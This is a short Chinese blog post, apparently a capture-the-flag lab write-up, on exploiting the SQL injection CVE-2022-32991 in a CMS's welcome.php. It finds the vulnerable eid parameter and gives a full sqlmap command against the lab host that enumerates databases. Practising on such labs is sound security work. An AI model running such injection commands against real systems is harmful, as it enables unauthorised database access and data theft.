[春秋云境] CVE-2022-32991

CVE-2022-32991

该CMS的welcome.php中存在SQL注入攻击。

在这里插入图片描述进入主界面，没有明显可以注入的地方，先注册登录。

在这里插入图片描述登录之后的界面
此处有个?q=1但是多次测试后，感觉不是注入点。
点击这个按钮，进入新的界面。
多次测试发现注入点

sqlmap -u "http://eci-2zeb8alt7sk432zz6n7j.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e*&n=1&t=10" --dbs
1

sqlmap指定参数进行注入
在这里插入图片描述

相关阅读:
什么是平面文件数据库？如何导入多种格式的文件：DSV、JSON、XML？
《C++新经典》第18章内存高级话题
JSP超市管理系统myeclipse定制开发SQLServer数据库网页模式java编程jdbc
Go 必知的10个命令
IDEA git操作技巧大全，持续更新中
点灯科技实现 “ESP8266-01/01s + 继电器” 远程开关
【MySQL基础】一条查询和更新语句的执行流程01-02
当promise遇上generator该如何应对？记一次工作中遇到的问题
SQL note1：Basic Queries + Joins & Subqueries
2022-08-11 学习日记（31st day）网络通信（网络编程）

原文地址：https://blog.csdn.net/cxiaodi/article/details/132916529